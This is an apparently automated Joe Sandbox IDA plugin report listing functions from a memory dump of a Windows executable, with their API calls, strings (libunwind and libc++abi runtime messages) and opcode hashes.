Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_reg(cursor=%p, regNum=%d, &value=%p)
API String ID: 1137233558-3294674404
Opcode ID: 9cb7dbdd395e0dc0e117b359f92bc1a8fce241447a1837db2b0fbb34ec30046f
Instruction ID: 17622783c1453f3d0c8fabd0b811f6a229554baa868a365a4131c0bd7fb612d2
Opcode Fuzzy Hash: 9cb7dbdd395e0dc0e117b359f92bc1a8fce241447a1837db2b0fbb34ec30046f
Instruction Fuzzy Hash: F5119312E3BA4782EB14BF22E850379E6B26FD9F84F840475CD4D93361EE3C98468360

Function 00007FF7797070F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779707133
memcpy.MSVCRT ref: 00007FF77970715E

Strings

true, xrefs: 00007FF77970714D
false, xrefs: 00007FF779707146

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: memcpyrealloc
String ID: false$true
API String ID: 2500458235-2658103896
Opcode ID: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
Instruction ID: 9602c7a7a0f6bb39ee1942a32a240c9d2fed4b8b65f355b959c0ebbb912e6415
Opcode Fuzzy Hash: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
Instruction Fuzzy Hash: D001BEE3E2674782EB18AF55E9413B9A372AF487C0F848431C65C07791EE2CD4818350

Function 00007FF7796F89B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF7796F89E2
fflush.MSVCRT ref: 00007FF7796F8A2D

Strings

LIBUNWIND_PRINT_APIS, xrefs: 00007FF7796F89DB
libunwind: __unw_get_proc_name(cursor=%p, &buf=%p, bufLen=%lu), xrefs: 00007FF7796F8A0D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_proc_name(cursor=%p, &buf=%p, bufLen=%lu)
API String ID: 1137233558-3584756005
Opcode ID: ddb072e9844bd1fc43088026deb61ec753b8945efa0d84c694245139cab19971
Instruction ID: 12124a624e190433c51b6d4c2c1e668781a74f3fb8d0271a6a4d5b87dac2768a
Opcode Fuzzy Hash: ddb072e9844bd1fc43088026deb61ec753b8945efa0d84c694245139cab19971
Instruction Fuzzy Hash: 8011A313A3B28782FB04AF16AC057B6D7A16F95FD0F84057ADD0E577A1ED3C98428324

Function 00007FF7796F4D00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7796F8C00: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF7796F4D18,?,?,?,00007FF7796F2E71,?,?,00007FF77981CC48,00000000,00007FF7796F1609), ref: 00007FF7796F8C11

FlsGetValue.KERNEL32(?,?,?,00007FF7796F2E71,?,?,00007FF77981CC48,00000000,00007FF7796F1609,?,?,?,?,00007FF7796F1315), ref: 00007FF7796F4D22

Part of subcall function 00007FF7796F80D0: calloc.MSVCRT ref: 00007FF7796F80DD
Part of subcall function 00007FF7796F80D0: memset.MSVCRT ref: 00007FF7796F8106

Part of subcall function 00007FF7796F8C90: FlsSetValue.KERNEL32(?,?,?,?,00007FF7796F4E16), ref: 00007FF7796F8C94

Strings

std::__libcpp_tls_set failure in __cxa_get_globals(), xrefs: 00007FF7796F4D79
execute once failure in __cxa_get_globals_fast(), xrefs: 00007FF7796F4D61
cannot allocate __cxa_eh_globals, xrefs: 00007FF7796F4D6D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: OnceValue$ExecuteInitcallocmemset
String ID: cannot allocate __cxa_eh_globals$execute once failure in __cxa_get_globals_fast()$std::__libcpp_tls_set failure in __cxa_get_globals()
API String ID: 2044551959-1509371760
Opcode ID: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
Instruction ID: c7e623bc3853b2c324f79879c4c12f721ad98dfb25a18c5007bf1880c14a5010
Opcode Fuzzy Hash: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
Instruction Fuzzy Hash: FC012C23E3B10792FA44BF11A8556B6E2735F84784FC04974D80D86BE2FE2CB8418320

Function 00007FF7796F8880 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF7796F88A8
fflush.MSVCRT ref: 00007FF7796F88ED

Strings

libunwind: __unw_get_proc_info(cursor=%p, &info=%p), xrefs: 00007FF7796F88CE
LIBUNWIND_PRINT_APIS, xrefs: 00007FF7796F88A1

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_proc_info(cursor=%p, &info=%p)
API String ID: 1137233558-1935908800
Opcode ID: e8ba0983abbb9daa666b015af6d5d3ea47504ba357e157cfbd2d07a602640b6c
Instruction ID: 09d3c4e3f3517e5777699f45da8fab97521cb648e9785916cf0bb164e156ebdd
Opcode Fuzzy Hash: e8ba0983abbb9daa666b015af6d5d3ea47504ba357e157cfbd2d07a602640b6c
Instruction Fuzzy Hash: 4801DB12E3F65382FB147F16E9003B6D6B15F49BC0F840479C91E573D1EE1C95818360

Function 00007FF7796F18B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

abort.MSVCRT(00000000,00000000,00000000,?,00007FF7796F1C09), ref: 00007FF7796F19EF
_assert.MSVCRT ref: 00007FF7796F1A08

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF7796F19FB
(base != 0) && "DW_EH_PE_datarel is invalid with a base of 0", xrefs: 00007FF7796F19F4

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertabort
String ID: (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0"$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp
API String ID: 1072228434-1306384422
Opcode ID: 55f8dda17198795800073456670580f640aef58b898c353accad96664cddbd08
Instruction ID: 71d670a7b596defbe0e69f6d67798256dac695d221a0d84fb8ba916b962a21eb
Opcode Fuzzy Hash: 55f8dda17198795800073456670580f640aef58b898c353accad96664cddbd08
Instruction Fuzzy Hash: 6C015AA3E3B61380FD65EF44D44117A92B76F543C0FCA0635CD4C82280FE2DA98583B0

Function 00007FF77970B380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970B3E6
memcpy.MSVCRT ref: 00007FF77970B400
_assert.MSVCRT ref: 00007FF77970B42A

Strings

basic_istream, xrefs: 00007FF77970B385
basi, xrefs: 00007FF77970B39A

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: basi$basic_istream
API String ID: 2326172077-1189760207
Opcode ID: f31d0bfda383c1b6082b963be46f988af25024c433917d3f22b798f058380b77
Instruction ID: 55f0e76c6f70edfa8c7de0110874fcfd7fbffeec4555afe8d25e06cf12a4643c
Opcode Fuzzy Hash: f31d0bfda383c1b6082b963be46f988af25024c433917d3f22b798f058380b77
Instruction Fuzzy Hash: BC0171A3B2665383EEA49F09F940769E3A1EB587C0F848431CA5D07781EB2CE6908350

Function 00007FF77970B38E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970B3E6
memcpy.MSVCRT ref: 00007FF77970B400
_assert.MSVCRT ref: 00007FF77970B42A

Strings

basic_iostream, xrefs: 00007FF77970B393
basi, xrefs: 00007FF77970B39A

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: basi$basic_iostream
API String ID: 2326172077-3201662033
Opcode ID: 1823fbeb78b408ddb3383061037edbd1725e6bbaf58f914d64ac0c32d595fd86
Instruction ID: 585d12361a813500a48307d1dac13dbcaa271fc9b1d41a8bdcda1e0695aff431
Opcode Fuzzy Hash: 1823fbeb78b408ddb3383061037edbd1725e6bbaf58f914d64ac0c32d595fd86
Instruction Fuzzy Hash: 97F044E7B2665283EEA49F05F940769E7A1EB587C4F848431CB5D07785EE2CD6908350

Function 00007FF7796F8920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF7796F8944
fflush.MSVCRT ref: 00007FF7796F8986

Strings

LIBUNWIND_PRINT_APIS, xrefs: 00007FF7796F893D
libunwind: __unw_resume(cursor=%p), xrefs: 00007FF7796F896A

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_resume(cursor=%p)
API String ID: 1137233558-227906034
Opcode ID: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
Instruction ID: 90624d42a796fec438c61242f717ec220482a745ad4aad07407e4fec04cb0c91
Opcode Fuzzy Hash: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
Instruction Fuzzy Hash: 2A01B102E3F64782F7047F16B8043B9E6B15F49BC0FC80476C90E23391EE1C64418361

Function 00007FF7796F87F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF7796F8814
fflush.MSVCRT ref: 00007FF7796F8856

Strings

LIBUNWIND_PRINT_APIS, xrefs: 00007FF7796F880D
libunwind: __unw_step(cursor=%p), xrefs: 00007FF7796F883A

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_step(cursor=%p)
API String ID: 1137233558-3760164396
Opcode ID: acbbefe464539abcaef1fe244cec8c422293ae8429e0ab9e7db6b12012d7a983
Instruction ID: c23fcf260f192bcf23c783688c85f8c7b3192f393e8fc0875deb12d5c38d1d8b
Opcode Fuzzy Hash: acbbefe464539abcaef1fe244cec8c422293ae8429e0ab9e7db6b12012d7a983
Instruction Fuzzy Hash: 0B018412E7F29782F714BF16E9003B5D6B25F99BD0FC4457AC90E27391EE2C64418360

Function 00007FF7796F3ED0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF7796F3F11
RaiseException.KERNEL32(?,?,?,00000030,00007FF7796F2F54), ref: 00007FF7796F3F37

Strings

libunwind: _Unwind_RaiseException(ex_obj=%p), xrefs: 00007FF7796F3EF5
CCG , xrefs: 00007FF7796F3F2A

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: ExceptionRaisefflush
String ID: CCG $libunwind: _Unwind_RaiseException(ex_obj=%p)
API String ID: 3404444629-1152080672
Opcode ID: ce7a8e6c7a6e572c481f42ceb0385a3df82124a6507f1b87121b6176e540b98d
Instruction ID: 70fb4896b79a347acb7bc61dff372b27730b4e1ce5272617b2f7727c5fc702b4
Opcode Fuzzy Hash: ce7a8e6c7a6e572c481f42ceb0385a3df82124a6507f1b87121b6176e540b98d
Instruction Fuzzy Hash: 3AF0F411E3A69243F6247F65B9016F59372AF897C1F805235ED4D03781FE2D95828360

Function 00007FF7796F2C20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7796F2C46
GetProcAddress.KERNEL32 ref: 00007FF7796F2C56

Strings

msvcrt.dll, xrefs: 00007FF7796F2C3F
_localtime64_s, xrefs: 00007FF7796F2C4C

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _localtime64_s$msvcrt.dll
API String ID: 1646373207-3474473506
Opcode ID: e6433b476ba74e81b9775fec21bde56a003506d6abc8a6f67e439d4aff4a0d78
Instruction ID: c2960cdb360ed815bcd879f524b02ebd16afd43d119be71dce000a4df3fc3586
Opcode Fuzzy Hash: e6433b476ba74e81b9775fec21bde56a003506d6abc8a6f67e439d4aff4a0d78
Instruction Fuzzy Hash: 7EF01722A3BA4391EE44AF02BC540B4A273AF48BC5FC08936DC0D83364EE2CA5498360

Function 00007FF7796F2BB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7796F2BD6
GetProcAddress.KERNEL32 ref: 00007FF7796F2BE6

Strings

msvcrt.dll, xrefs: 00007FF7796F2BCF
_localtime64_s, xrefs: 00007FF7796F2BDC

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _localtime64_s$msvcrt.dll
API String ID: 1646373207-3474473506
Opcode ID: 996eddf4707004b26ca684804fcf8aaff092c600e71e1cc29f878679b6fdd581
Instruction ID: b842b011444ab0dacb3109950f3d352141ef3d61fa76ac0d3a72039059947007
Opcode Fuzzy Hash: 996eddf4707004b26ca684804fcf8aaff092c600e71e1cc29f878679b6fdd581
Instruction Fuzzy Hash: CDF01762A3BA4391EE44EF02BC540B5A273AF48BC5FC08936DC0D83364EE2CA5498360

Function 00007FF779712CD0 Relevance: 6.4, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF779712D71
LeaveCriticalSection.KERNEL32 ref: 00007FF779712DAA
free.MSVCRT ref: 00007FF779712E1D
LeaveCriticalSection.KERNEL32 ref: 00007FF779712E46

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: CriticalLeaveSection$free
String ID:
API String ID: 2017658852-0
Opcode ID: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
Instruction ID: 3d3948fa64780fb2a8746680867eb979bb0289149dc5fd9a4bb21257917335e2
Opcode Fuzzy Hash: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
Instruction Fuzzy Hash: F4513D23A7A647C2EB54BF059855375E2B1AF88BC4F980835C94D06791DE3CE495C3A0

Function 00007FF7796FDC20 Relevance: 6.4, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007FF7796FDC93
memcpy.MSVCRT ref: 00007FF7796FDCC4
free.MSVCRT ref: 00007FF7796FDD7E
memcpy.MSVCRT ref: 00007FF7796FDDAF
free.MSVCRT ref: 00007FF7796FDDF8

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: free$memcpy
String ID:
API String ID: 4107583993-0
Opcode ID: 8e1b853cacffe1525c6de4d4fc907dd5a3da612f1d84b0e28030ca1136726b77
Instruction ID: 9acf99ee5b5c8a980e9b91f1a76246f920d8d4e3d40cdde467e2f3b8e414c96f
Opcode Fuzzy Hash: 8e1b853cacffe1525c6de4d4fc907dd5a3da612f1d84b0e28030ca1136726b77
Instruction Fuzzy Hash: FC513073626B9286DA60DF15F5986AEB3BAF744784F514235CB9E83B50EF38E091C310

Function 00007FF7796FABE0 Relevance: 6.3, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007FF7796FAC20
free.MSVCRT ref: 00007FF7796FAC38
free.MSVCRT ref: 00007FF7796FAC50
free.MSVCRT ref: 00007FF7796FAC68
free.MSVCRT ref: 00007FF7796FACAB

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
